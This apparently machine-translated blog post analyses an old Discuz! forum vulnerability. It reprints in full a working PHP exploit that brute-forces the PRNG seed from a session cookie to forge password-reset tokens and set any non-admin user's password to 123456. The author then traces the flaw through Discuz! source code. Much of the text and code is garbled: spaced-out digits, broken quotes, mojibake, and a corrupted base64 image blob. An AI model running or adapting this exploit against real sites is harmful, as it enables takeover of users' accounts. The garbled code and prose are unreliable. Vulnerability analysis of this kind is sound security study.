About SSV-ID: 4 4 7 4 POC analysis and reflection-vulnerability warning-the black bar safety net

SSV-ID: 4 4 7 4

SSV-AppDir: Discuz! Vulnerability

Published: 2008-11-21 (GMT+0 8 0 0)

URL: http://sebug.net/vuldb/ssvid-4474

A very old vulnerability, just as the study of penetration of a material of the bale, with its poc, the direct can be used, it feel so magical at the same time want to analyze it principle. Not what was high-end stuff, great God Oh, I’m right when do a learn notes.

2. <? php

3. 3. print_r(’

4. ±--------------------------------------------------------------------------+

5. Discuz! Reset User Password Exploit

6. by 80vul

7. team: http://www.80vul.com

8. ±--------------------------------------------------------------------------+

9. ‘);
   1 0. 1 1. if($argc <6){
   1 2. print_r(’
   1 3. ±--------------------------------------------------------------------------+
   1 4. Usage: php ‘.$ argv[0].’ host path user mail uid
   1 5. host: target server (ip/hostname)
   1 6. path: path to discuz
   1 7. user: user login name
   1 8. mail: user login mail
   1 9. uid: user login id
   2 0. Example:
   2 1. php ‘.$ argv[0].’ localhost /discuz/ 80vul [email protected] 2
   2 2. ±--------------------------------------------------------------------------+
   2 3. ‘);
   2 4. exit;
   2 5. }
   2 6. 2 7. error_reporting(7);
   2 8. ini_set(‘max_execution_time’,0);
   2 9. 3 0. $host = $argv[1];
   3 1. $path = $argv[2];
   3 2. $user = $argv[3];
   3 3. $mail = $argv[4];
   3 4. $uid = $argv[5];
   3 5. 3 6. $fp = fsockopen($host,8 0);
   3 7. 3 8. $data =“GET “.$ path.“viewthread.php HTTP/1.1\r\n”;
   3 9. $data .=” Host: $host\r\n”;
   4 0. $data .=" Keep-Alive: 3 0 0\r\n";
   4 1. $data .=" Connection: keep-alive\r\n\r\n";
   4 2. 4 3. fputs($fp, $data);
   4 4. 4 5. $resp =";
   4 6. 4 7. while($fp &&! feof($fp)){
   4 8. $resp .= fread($fp,1 0 2 4);
   4 9. preg_match(’/&formhash=([a-z0-9]{8})/‘, $resp, $hash);
   5 0. if($hash)
   5 1. break;
   5 2. }
   5 3. 5 4. if($hash){
   5 5. $cmd =‘action=lostpasswd&username=’. urlencode($user).’& amp;email=‘. urlencode($mail).’& amp;lostpwsubmit=true&formhash=‘.$ hash[1];
   5 6. $data =“POST “.$ path.“member.php HTTP/1.1\r\n”;
   5 7. $data .=” Content-Type: application/x-www-form-urlencoded\r\n”;
   5 8. $data .=" Referer: http://$host$path\r\n";
   5 9. $data .=" Host: $host\r\n";
   6 0. $data .=" Content-Length: “. strlen($cmd).”\ r\n";
   6 1. $data .=" Connection: close\r\n\r\n";
   6 2. $data .= $cmd;
   6 3. 6 4. fputs($fp, $data);
   6 5. 6 6. $resp =";
   6 7. 6 8. while($fp &&! feof($fp))
   6 9. $resp .= fread($fp,1 0 2 4);
   7 0. 7 1. fclose($fp);
   7 2. 7 3. preg_match(’/Set-Cookie:\s[a-zA-Z0-9]+_sid=([a-zA-Z0-9]{6});/‘, $resp, $sid);
   7 4. 7 5. if(!$ sid)
   7 6. exit(“Exploit Failed!\ n”);
   7 7. 7 8. $seed = getseed();
   7 9. if($seed){
   8 0. mt_srand($seed);
   8 1. random();
   8 2. mt_rand();
   8 3. $id = random();
   8 4. 8 5. $fp = fsockopen($host,8 0);
   8 6. 8 7. $cmd=‘action=getpasswd&uid=’.$ uid.’& amp;id=‘.$ id.’& amp;newpasswd1=1 2 3 4 5 6&newpasswd2=1 2 3 4 5 6&getpwsubmit=true&formhash='.$ hash[1];
   8 8. $data =“POST “.$ path.“member.php HTTP/1.1\r\n”;
   8 9. $data .=” Content-Type: application/x-www-form-urlencoded\r\n”;
   9 0. $data .=" Referer: http://$host$path\r\n";
   9 1. $data .=" Host: $host\r\n";
   9 2. $data .=" Content-Length: “. strlen($cmd).”\ r\n";
   9 3. $data .=" Connection: close\r\n\r\n";
   9 4. $data .= $cmd;
   9 5. 9 6. fputs($fp, $data);
   9 7. 9 8. $resp =“;
   9 9. 1 0 0. while($fp &&! feof($fp))
   1 0 1. $resp .= fread($fp,1 0 2 4);
   1 0 2. 1 0 3. if(strpos($resp,'æ’çš"å†ç å·2重新设置，è·ä½¿ç"æ–°å†ç ç™"录〔)!== false)
   1 0 4. exit(“Expoilt Success!\ nUser New Password:\t123456\n”);
   1 0 5. else
   1 0 6. exit(“Exploit Failed!\ n”);
   1 0 7. }else
   1 0 8. exit(“Exploit Failed!\ n”);
   1 0 9. }else
   1 1 0. exit(“Exploit Failed!\ n”);
   1 1 1. 1 1 2. function getseed()
   1 1 3. {
   1 1 4. global $sid;
   1 1 5. 1 1 6. for($seed =0; $seed <=1 0 0 0 0 0 0; $seed ++){
   1 1 7. mt_srand($seed);
   1 1 8. $id = random(6);
   1 1 9. if($id == $sid[1])
   1 2 0. return $seed;
   1 2 1. }
   1 2 2. returnfalse;
   1 2 3. }
   1 2 4. 1 2 5. function random($length =6)
   1 2 6. {
   1 2 7. $hash =";
   1 2 8. $chars =‘ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz’;
   1 2 9. $max = strlen($chars)-1;
   1 3 0. for($i =0; $i < $length; $i ++)
   1 3 1. $hash .= $chars[mt_rand(0, $max)];
   1 3 2. 1 3 3. return $hash;
   1 3 4. }
   1 35. 1 3 6. ?& gt;

2. Demo

poc don’t have to do any modifications can be used directly.

php.exe DiscuzResetUserPasswordVulnerability.php 192.168.174.131 / little [email protected] 2

! [](/Article/UploadPic/2013-8/2 0 1 3 8 2 9 9 4 9 2 6 5 6 1 9 1. png)

The target user’s password will be you to modify a 1 1 1.

3. Code analysis

We come now to a step by step analysis of this vulnerability causes and the poc of the use of thought.

This exploits the DZ password retrieve function to the target user’s password for illegal modifications, but the system is how to distinguish is not that the user himself in the password to get back? DZ is the use of a pseudo-random number algorithm the random unpredictable to guarantee the authenticity of the user, i.e., DZ based on the pseudo-random number generation function algorithm to generate the id_hash to authenticate. But the problem also here, this algorithm is the randomness of strength is not enough, can lead to through violence guess the way to reverse infer this id_hash in.

First, the poc is the first thing to do is to get a formhash of:

$data ="GET ".$ path.“viewthread.php HTTP/1.1\r\n”;…

preg_match(‘/&formhash=([a-z0-9]{8})/’, $resp, $hash);

Because the DZ to defend against CSRF attacks, for each form are set up formhash, thus effectively prevents cross-domain CSRF attacks(although there are methods to bypass, but it is not this time the scope of the analysis.)

In include/global_func. php Library for formhash check the function implementation code:

! [](/Article/UploadPic/2013-8/2 0 1 3 8 2 9 9 4 9 4 3 7 9 8 9 4. png)

So we in the form of analog prior to submission, to first obtain a valid formhash it.

Next is to send the password to retrieve the request a POST request. This is the UI interface screenshots

! [](/Article/UploadPic/2013-8/2 0 1 3 8 2 9 9 4 9 5 8 1 6 4 3 7. png)

! [](/Article/UploadPic/2013-8/2 0 1 3 8 2 9 9 5 0 1 3 9 4 3 8 0. png)

View our poc code:

if($hash){

$cmd =‘action=lostpasswd&username=’. urlencode($user).‘& amp;email=’. urlencode($mail).‘& amp;lostpwsubmit=true&formhash=’.$ hash[1];

$username:the target user name

$email:the target user’s mailbox

$formhash:formhash

Next, the poc is extracted to obtain the HTTP header cookie settings information:

$resp .= fread($fp,1 0 2 4);

…

preg_match(‘/Set-Cookie:\s[a-zA-Z0-9]+_sid=([a-zA-Z0-9]{6});/’, $resp, $sid);

This cookie value is the first focus, we want to detailed analysis of how this cookie launched id_hash.

Next, a poc for some very important arithmetic operation:

if(!$ sid) //$sid is just to get the cookie value

exit(“Exploit Failed!\ n”);

$seed = getseed();

if($seed){

mt_srand($seed);

random();

mt_rand();

$id = random();

$fp = fsockopen($host,8 0);

$cmd =‘action=getpasswd&uid=’.$ uid.‘& amp;id=’.$ id.‘& amp;newpasswd1=1 2 3 4 5 6&newpasswd2=1 2 3 4 5 6&getpwsubmit=true&formhash=’.$ hash[1]; //put the calculated id_hash into the POST parameters in the domain

That getseed()what does that mean? We enter the DZ of the source code for white-box analysis to see 80vul is how to use the reverse algorithm reaches the bursting of purpose(I feel this is somewhat similar to the reverse inside of the algorithm is the reverse, the principle is the same, are from the result of the launch of origin)

We have just the second sent the POST request:

$cmd =‘action=lostpasswd&username=’. urlencode($user).‘& amp;email=’. urlencode($mail).‘& amp;lostpwsubmit=true&formhash=’.$ hash[1];

Corresponding to the code inside is this paragraph:

member.php

elseif($action == ‘lostpasswd’)
{
$discuz_action = 1 4 1;
if(! submitcheck(‘lostpwsubmit’))
{//Based on formhash of the CSRF check
include template(‘lostpasswd’);
}
else
{
$secques = quescrypt($questionid, $answer);
$query = $db->query(“SELECT uid, username, adminid, email FROM {$tablepre}members WHERE username=‘$username’ AND secques=‘$secques’ AND email=‘$email’”);
if(!$ member = $db->fetch_array($query))
{
showmessage(‘getpasswd_account_notmatch’, NULL, ‘HALTED’);
}
elseif($member[‘adminid’] == 1 || $member[‘adminid’] == 2)
{
showmessage(‘getpasswd_account_invalid’, NULL, ‘HALTED’);
}
$idstring = random(6);
$db->query(“UPDATE {$tablepre}memberfields SET authstr=‘$timestamp\t1\t$idstring’ WHERE uid=‘$member[uid]’”);
sendmail(“$username <$member[email]>”, ‘get_passwd_subject’, ‘get_passwd_message’);
showmessage(‘getpasswd_send_succeed’);
}
}

You can see, the program first CSRF check, and then according to our submitted by the target user parameters from the database to identify the username,adminid,email parameters, and determine the adminid is 1/2(normal user adminid from 3 starts counting, the administrator is 1), i.e. cannot retrieve the Administrator’s password.

Then there is the sentence very key words:

$idstring = random(6);

Next on directly to the generated id_hash inserted into the database.

$db->query(“UPDATE {$tablepre}memberfields SET authstr=‘$timestamp\t1\t$idstring’ WHERE uid=‘$member[uid]’”);

random()function is located in:/include/global_func. php

function random($length, $numeric = 0)
{
PHP_VERSION < ‘4.2.0’ && mt_srand((double)microtime() * 1 0 0 0 0 0 0);
if($numeric)
{
$hash = sprintf(‘%0’.$ length.‘d’, mt_rand(0, pow(1 0, $length) - 1));
}
else
{
$hash = ";
$chars = ‘ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz’;
$max = strlen($chars) - 1;
for($i = 0; $i < $length; $i++)
{
$hash .= $chars[mt_rand(0, $max)];
}
}
return $hash;
}

Note the first sentence:

PHP_VERSION < ‘4.2.0’ && mt_srand((double)microtime() * 1 0 0 0 0 0 0);

From PHP 4.2.0 onwards, no longer need to use srand() or mt_srand() to the random number generator seeding, as is now done automatically by the system.

Our PHP version in the 5. 0 or more, so the seeds are done automatically by the system.

Then the code in the 2 6 letters, including uppercase and lowercase and numbers in a randomly generated long degrees$length pseudo-random strings.

So, we now know, in our email to retrieve the password in the POST request, the system will run the code:

$idstring = random(6);

Generate a 6-bit pseudo-random string and then inserted into the database.

! [](/Article/UploadPic/2013-8/2 0 1 3 8 2 9 9 5 0 3 9 3 7 7 8 9. png)

That this our poc in the third step to obtainTo cookies what is the relationship? We continue to analyze the poc code after detailed analysis of the value of the cookie and and id_hash relationship.

poc do the third step is:

$cmd =‘action=getpasswd&uid=’.$ uid.‘& amp;id=’.$ id.‘& amp;newpasswd1=1 2 3 4 5 6&newpasswd2=1 2 3 4 5 6&getpwsubmit=true&formhash=’.$ hash[1];

$data ="POST ".$ path.“member.php HTTP/1.1\r\n”;

action:reset password action

uid:front fill in target user id

id:We by the algorithm to obtain a pseudo-random string

newpasswd:new password

formhash:formhash

This step is equivalent to we in the mailbox will receive a confirmation email, asking us to click and then go to the reset password link.

This action corresponds to: member. php inside the code logic is:

elseif($action == ‘getpasswd’ && $uid && $id)
{
$discuz_action = 1 4 1;
$query = $db->query(“SELECT m. username, mf. authstr FROM {$tablepre}members m, {$tablepre}memberfields mf
WHERE m. uid=‘$uid’ AND mf. uid=m. uid”);
$member = $db->fetch_array($query);
list($dateline, $operation, $idstring) = explode(“\t”, $member[‘authstr’]);
if($dateline < $timestamp- 8 6 4 0 0 * 3 || $operation != 1 || $idstring != $id)
{
showmessage(‘getpasswd_illegal’, NULL, ‘HALTED’);
}
if(! submitcheck(‘getpwsubmit’) || $newpasswd1 != $newpasswd2)
{
include template(‘getpasswd’);
}
else
{
if($newpasswd1 != addslashes($newpasswd1))
{
showmessage(‘profile_passwd_illegal’);
}
$password = md5($newpasswd1);
$db->query(“UPDATE {$tablepre}members SET password=‘$password’ WHERE uid=‘$uid’”);
$db->query(“UPDATE {$tablepre}memberfields SET authstr=” WHERE uid=‘$uid’");
showmessage(‘getpasswd_succeed’);
}
}

You can see, the code from the database to find out we have just the Retrieve password operation generated id_hash in. Then determine what is over the 3-day timesxpire it. Then is the most critical:

|| $idstring != $id

Directly to our submission of the$id and the database of pseudo-random string$idstring equivalent comparison, that is, our algorithm derived the$id must equal to database$idsring to get through the password reset logic.

We can now come back to analyze our poc algorithm is how to pass the cookie value calculated by the pseudo-random id_hash.

Through the webscarab proxy to intercept the capture, find the DZ is the first of our local write into a cookie value, and then send the HTTP entity content. That is in the call to random(6)generates a pseudo-random id_hash before Mr. into a cookie and sent to our browser.

From the member. php processing to retrieve the password of the code logic where the forward back, found that in head require a common. inc. php file. Here the lower breakpoint die(“ok”). Find the value of the cookie still gets to

! [](/Article/UploadPic/2013-8/2 0 1 3 8 2 9 9 5 1 2 7 9 1 2 0. png)

! [](/Article/UploadPic/2013-8/2 0 1 3 8 2 9 9 5 1 1 3 4 5 2 2 7. png)

Description of the common. inc. php which contains the Set-cookie information code:

include/common.inc.php

See the Set cookie code:

if(empty($_DCOOKIE[‘sid’]) || $sid != $_DCOOKIE[‘sid’])
{
dsetcookie(‘sid’, $sid, 6 0 4 8 0 0);
}

Continue to back the$sid.

$sid = daddslashes(($transsidstatus || CURSCRIPT == ‘wap’) && (isset($_GET[‘sid’]) || isset($_POST[‘sid’])) ?
(isset($_GET[‘sid’]) ? $_GET[‘sid’] : $_POST[‘sid’]) :
(isset($_DCOOKIE[‘sid’]) ? $_DCOOKIE[‘sid’] : "));

And then back$_DCOOKIE[‘sid’] is.

if(!$ sessionexists)
{
if($discuz_uid)
{
$query = $db->query(“SELECT $membertablefields, m. styleid
FROM {$tablepre}members m WHERE m. uid=‘$discuz_uid’ AND m. password=‘$discuz_pw’ AND m. secques=‘$discuz_secques’”);
if(! ($_DSESSION = $db->fetch_array($query)))
{
clearcookies();
}
}

if(ipbanned($onlineip)) $_DSESSION[‘ipbanned’] = 1;

$_DSESSION[‘sid’] = random(6);
$_DSESSION[‘seccode’] = random(6, 1);
}

Note that here The if judge. if(!$ sessionexists): session value does not exist when entering this block of code logic, and we know the session while there on the server, but the session and the user’s correspondence is through our sent to the server the cookie values to links, but the poc did not send any cookie, so every time our session is empty, it will be this piece of code logic.

Look at the key sentences：

$_DSESSION[‘sid’] = random(6);
$_DSESSION[‘seccode’] = random(6, 1);

The first sentence is to generate a 6-bit length of the pseudo-random string, the second sentence is to generate a 1-bit length of the pseudo-random string. Is essentially 6 times mt_rand()plus 1 times mt_rand () it.

Here are the a very important points to note about PHP mt_rand (), because we in this HTTP interaction is the first use of mt_rand (), so the system will automatically generate a seed, don’t we then manually assigned the value of seed, and this seed at the time of the HTTP interaction will not be changed back no matter how many times mt_rand()are based on this seed it.

Sort out the DZ the entire code flow:

1. In the first mt_rand()before the system automatically generates a seed, this process for the programmer is transparent.-------- Equivalent to break out inside of mt_srand($seed);

2. 6 times mt_rand()to generate a sid for the set-cookie.----- Equivalent to the poc inside of a random()call

3. 1 mt_rand()to generate a seccode------equivalent with the poc inside of a mt_rand()

4. 6 times mt_rand()to generate a idstring, i.e., the id of the pseudo-random string, and save into the database--------equivalent to the poc inside of a random()call

Well, we next look at the poc inside generating id_hash of the algorithm is how to write:

function getseed()

{

global $sid;

for($seed =0; $seed <=1 0 0 0 0 0 0; $seed ++)

{

mt_srand($seed);

$id = random(6);

if($id == $sid[1])

{

return $seed;

}

}

return false;

}

Because PHPmt_rand()default auto seeds works:

((double)microtime() * 1 0 0 0 0 0 0);

So the for Loop maximum value is 1 0 0 0 0 0 0 it.

Then the code with cookie sid the same way to generate random(6)to generate a random hash, with the hash and the cookie value are compared, and through the for Loop continues the replacement of the seed, the seed for the reverse guess, see here, I suddenly feel the reverse in the algorithm register machine idea is similar. Is an algorithm of reverse thinking, which is why you want to write the reason for this article, feel this idea is quite interesting.

Next, if you get and sid the same hash, it means that we reverse the launch of a seedAnd then according to DZ of the program logic, one run corresponding to the number of mt_rand (), is to get the id_hash in.

Get id_hash, you can construct a third POST data package, the target user for password reset.

! [](data:image/png;base64, iVBORw0KGgoAAAANSUhEUgAAAhoAAACccaiaaac2rzwdaaame0leqvr4no3aw24brxbg8vrgxb4smtsiegagswbbmr2gvdmxik8iiwebmuadbjg4saliqj7missw7shnoclmdvwdu6ebh2rt+v9wHlrN6urqi89HKQkLAAA2Fva9AADAbuccaaaceccaaafecqdaaxecahbanaaahbanaaah242tt7/8QVEURd2F2nqcbHV+AMBIECcAAAc7ipN/fZpTFEVRt7iIE4qiKMqhdhQn//48pyiKom5xEScURVGUQ+0oTv7zeU4dbu39NZVq73eG2qT2/v7wXvkWcUJRFEU51I7i5L83801q77eJGmfxxlhbkn6ryxuycxk7k4qqqmg3ypvmlmxxb1murw1sy4qt92f3or10+mOz/+U0hPDgpf/F//PZJJ05XUO49+zS63Q/nkQXFT+DbpwkO5Nh1chJdipjjBNSFEVZakdxcnUzr9f7s3sh3ht2exuzv7q5fhocqpj+ZDlwaP26ihNhDc2AydP3Pqf76aR8RU0Tvyp1+b6n0HOinVCafNhJKYqirkYcJ/Or1S8l641VADTWMRD9SrE8/OW03V438ZfTuLGuZu6mhbSGzlnWh8TrWr11/iCEcDy5txq5GjN9kMXJgI5feZy2oyyRQ1eu1at2fccfz/N6XZwdhXB0epn++GoaQnj4qjPg55MQwuTpxfzj7PxhCOHk/ONsvh75aho6I6c/r090/jCEcHz2bjm+maS8hujY9VnenU6WR12cHa0OT0e2Z7w4o1omzfmdkmbj8hmsmrgeldumkg4xc0kkjyole9n7dxtr7/f/ttben+yBvlcjjpO2g3fjpJsNUYRkO4tx8u50sh5/cXaUzLY8xVozyTpC8nW+an/pyeKte2AWbMtqDrY/bGW8cSo9mfb+NlMUdYg14jjJfzuZxb172Zo78dCWGCeXt49xv5rm5h9n5w/X26U1rObpxEkbGFG8lX9b6sbJu9OJEid/+stfjc3dEif6VANmpiiK0mtHcXI9m9dr1crjhx++ml+v4iQe3KZI8dPrVQxcz+YvTkII0xfZftMaVtnQpML3F50x8c7oLMtdonxmy5yv9/pkZ762dn++UT22OJXE9LAoiqK6Nd44WTffNjDiMFinsns+2xnWUy3/S8aL2fx6dvn9caehrzNJWMP6jM0vIifn11fcric3z2lioxmnwkq6zyckh6pjidtziykirze9j4gqiqjcakdx8unlvf6/J//dYvqi2f96GkJ49Hq93Tg6vSwc+Pi82fni8XKSR49XU73u/J9d4f7Z29PJeubyGtYTRh9Nfvi9GX/5w/3lrkeP20WeP4qP+jL/7XSSrqRbzQzNxtH9SftjcUyyLX2kjGl+/PPqb2vKUW1dj7VM7xU11tr7+8N75VtjipO7WtU4qWaDFCeJ+JA4TtqdUphRFEVVa0dx8vnLfJPa+23a4gOI/O3v/1AyIBmvzPbJFjmfstQ5uDjhvaK2UbxXw+ ow4oSiKIoaee0qTr7Ot1v7vo/Ufor3itpG8V4Nqh3Fyc3XOUVRFHWLizihkiqihgphctl72qnukmpwvffunor3alinmu4oiqkog6tdxcn/qDtWu3mD936Z1I6L92rEtaM4efvLHxRFudqtrh3fcqdgdinoaaaoibmagapibadggdgbadggtgaadogtaiad4gqa4ia4aqa4ie4aaa6iewcaa+IEAOCAOAEAOCBOAAAOiBMAgAPiBADggDgbadggtgaadogtaiad4gqa4ia4aqa4ie4aaa7ggychpgtl9uqd8k/1MZss5qBZbp0ysvpo2p3VE7XiSZIFFPVakjsjnbuaacysj/k/b6WRxS1Aagp6nPRtLsM7zofnk/DkjXFjqPzWbXI5UiNWDlcmtNy6+GHZxys77RcY7+z7VgCIjSVOYtWeWGwc0s7iPJb259NZ8qjyqpzkky/urLbL0G3o+jzFOfWF9VptvFM5keW6qosxrhmAYixxkjci6dn8cl4htcvit1jwou80stpjzznll/v22+XGkzedOGkH9A6Y5OqSm2C8lmK02B+HvrDi/vxpDp5QP8SYN8PmBzCWOFmU/pAV71+UcmJh66FKS83bSjWr7Fe0WPT+Y9ebJ2Hy/MNi0G8sA+LE0kyLP1YnUcYXP5Uerq44zH6lvU6nXCoaxtjjjnljhnmry5sculrnkj7sl07angm2o3minlwk6ylr1n9mdiyto95iykbpu8qts7t4vvurt7x6rl7r/kjAAIkRxcnC/FtFsWVIPWXYhv5FNTmX1ll6x0msjZZ+f6ZTWqoxTpSrzn8Urz1bTHG/dJZ8hcp28XDjsfl2/qClYfq1A3fKocZJ/k9a7zXSifTGkYyR1qy1ld5xUv4Ll6WFJwokfbl44dxblz+3Ok9+lGVaZU8xbKSzbB4n0oa0E8CI4kRvf9LOpgdy8fq2cshcbk/KIR1D/9tJ5+9eq7Po/UvqqtWrk45S7lg1PKozxPPombSoPYX88m3jjfmm5fkbo+4g48SyZ/D3SuPXVWUBHYXM+PB8EkJ48qbdKP+fXd0wMcjbX984yXcW70ByIuO5ep2uOEBp7sm2tkt4i2v5lucoidgwokk2ioiwzu9xwulxz9wiazfj9tiai7ta/Fb0jRPjgfk9kW6R3uLz/ZanYHxbiovM51TeCgCKscRJTE+IagzER0ntQOkO9g47TtWOuRDuoT6D5QYw+7s0TO/dxXdAmjY+b3V72LIP6AUA9mWMcQIAODjECQDAAXECahbanaaahbanaaahxakawafxagbwqjwaabwqjwaab8qjamabcqiaceccaaaceccaaafecqdaaxecahbanaaahbanaaahxakawafxagbwqjwaabwqjwaab8qjamabcqiaceccaaaceccaaafjippwzxdep26muizmplj+zCeRBhdPF775rq38x3yG4gDl7BL7zcwvj1la8wzwb8uwrvynszzfeouqz8vyoaa0dixo7p/U9TixdDElUZLJ9TCQmrI+Z6/F9xqjhFlxwcW1FU8xrOHmKat3cOMY/XTGq7A8DgCN8caJ3pqV7UW3D+bzSDNbvoTGjdXedqWzV++AdDekljrsm7V+94pXrdzPDdtu9XAlZTfJpL7vGIDEWOKk2ptjt4vdii0jn0fp98q5pdpmr1unkv6i8ml+LdWZjectfqQHXr5RnHPzbmuMJcuJ+i7GmNy95gTumrHEycLWnavfHPNj9R+lfl3s7Mb5FdWLqh5ejVL9vPr3cf329orhxlduxgo+zN7i9UnyMX23AeQOL04sbaU4ld5HpI3qvpp6laf5a6tghdqlkzh2+yNde3Fb2mPv8kXKJMWFSSu33OfqdVVvAgdjgcvjcbz0kziqsqpjp82dxn7mlfvzdrtkjaxl6wokyjq2kpxof1vnf+lm9r0uy379LO0eSyQDSIwlTqTWH28P/gba6+vn4DhR2l++vA37vv0QaUzxKOlKi9eeHCi13V5x4hWT+ rNItu3ZA0AxljhZmDv1Qu5u0pzJtr1lSyfnjxm9oao9vxii3nb1mfarmwatjfpscsidnea7hhr2y7orngtabkrxsuj5zvnvq0rxmmaj0t+lo6oZkP+oXEJxKn1n9cC8P0r3Jw+h/NM8NftmibK2vu27V5wY10mEAHYjipM8Boqnobkfdy7ok+/Ue5blu7l+6mRbWph0VPFi85HSYvIByv7i4dJ9rsbqsk/wUhQpj0C5dcWS5rGsre/lAHfWWOLE3r7tO/WeIo2vnqXa8Yvf3JOj8mOV2SyLKV5y9Zt+skhlgHE90k6FHqv5fuWovvPnt0i5gcPCerg7xhinaicdrpwaabwqjwaab8qjamabcqiaceccaaaceccaaafecqdaaxecahbanaaahbanaaahxakawafxagbwqjwaabwqjwaab8qjamabcqiaceccaaaceCcAAAfECQDAAXECAHBAnAAAHGw9TiiKoqi7ununewdahugcaaaceccaaafecqdaaxecahbanaaahbanaaahxakawafxagbwqjwaabwqjwaab8qjamabcqiaceccaaaceccaaafecqdaaxecahbanaaahbanaaahxakawafxagbwqjwaabwqjwaab8qjamdb/wGpqFte8nLAZQAAAABJRU5ErkJggg==)

Thus, it is done through violence guess the solution for an arbitrary user’s password be reset.

4. Vulnerability causes

I feel this vulnerability causes is now because of the pseudo-random algorithm itself, the randomness is not strong, i.e., the plaintext space is too small, the attacker can be limited time within the plaintext space for violent guess, to achieve the ciphertext space. If you want to solve this problem, you should replace the plaintext space of the larger algorithm. Similar to MD5,SHA1 kind of, so based on the reverse algorithm of guessing becomes very difficult.

Thus, the entire poc on the results of this analysis, the next continue to study DZ of the other’s vulnerability and the poc, the hope can from each of the vulnerabilities are carefully analyzed, and learned something.

As long as there is dream, the heart will be able to fly